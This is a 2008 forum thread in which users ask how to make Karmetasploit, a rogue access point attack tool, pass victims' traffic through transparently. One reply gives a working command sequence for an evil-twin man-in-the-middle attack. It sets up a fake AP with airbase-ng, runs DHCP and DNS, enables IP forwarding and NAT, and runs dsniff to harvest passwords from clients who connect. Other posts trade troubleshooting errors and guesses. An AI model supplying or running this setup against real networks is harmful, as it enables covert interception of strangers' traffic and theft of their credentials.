Transparent Karmetasploit

09-21-2008, 10:58 PM
I got Karmetasploit up and running following the tutorial on Metasploit's site (metasploit.com/dev/trac/wiki/Karmetasploit). Everything works fine; however, when a client connects to Karmetasploit, let's say the client tries to go to Google... Karmetasploit does its thing and gets information, but Google never loads.

I can't seem to find any information on making Karmetasploit transparent. Has anybody figured it out?

09-22-2008, 07:58 AM
What is your network configuration?
How many NICs, and what is their configuration?

09-22-2008, 03:54 PM
If you go back and read that documentation, it will tell you that it's a blackhole and doesn't forward traffic on.

09-23-2008, 10:18 PM
Yeah, I know. I saw a video of a demonstration of Karmetasploit and he had it working transparently (I don't remember where I saw the video). I was curious to see if anybody knows how he did it.

09-24-2008, 12:36 AM
I have no clue, have never used it... but I'm guessing you would need a separate internet connection and have all traffic proxied through that connection... it'd be like bridging the connection...

They connect to you, and you have it getting their info, and then it passes it through to Google or whatever through the other connection...

Don't think you can do it with just one connection...

10-01-2008, 05:30 PM
It would seem that the main issue would be how well your system can route traffic. If your system has all the functionality of a wireless AP, then it should be possible to masquerade as the friendly router and send the traffic back and forth.

If you are trying to be just a transparent man in the middle that sniffs passwords (like what Cain and Abel does for wired connections), then there may be a better way of going about it than Karmetasploit, since the main function of Karmetasploit isn't to be passive but to find vulnerabilities, which is much easier if the client thinks you are a legit AP, and then exploit what you find to deliver your payload.

10-01-2008, 08:26 PM
To be able to do the attack the way you want, you have to install dnsmasq:

wget vvvvvv.thekelleys[org][uk]/dnsmasq/dnsmasq-2.45.tar.gz (I have not reached 15 posts)
tar xvzf dnsmasq-2.45.tar.gz
cd dnsmasq-2.45
make && make install

Once you have dnsmasq, create a conf file with the parameters you might need, then you can set up the machine to bridge from your wireless card to the NIC like this:

wlanconfig ath0 destroy
airmon-ng start ath0
airbase-ng -c 1 -e testwlan ath0
ifconfig at0 up && dhcpd at0
dnsmasq -C /etc/dnsmasq.conf &
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

Once you are bridging and providing the correct DHCP and DNS info, run dsniff -c -m -i at0. Do use the latest drivers and patch them, and also use the latest svn of aircrack-ng. Is this what you were looking for? Your mileage may vary depending on the card and the version of the driver.

10-30-2008, 04:23 PM
Hey Karma, any chance you could post the .conf file you used? I've been working on mine and I keep getting glitches, and I'd like to compare them.

11-03-2008, 05:49 PM
I get this error when I follow your steps outlined above:

dnsmasq: failed to bind listening socket to Address already in use

or if I specify with -a:

dnsmasq: failed to create listening socket: Address already in use

11-11-2008, 01:22 AM
I saw "the middler" do this at the last Defcon, and he wasn't using a 2nd bridged connection. He basically sat in the middle forging replies to both ends. Cool stuff, but I haven't found the code released yet...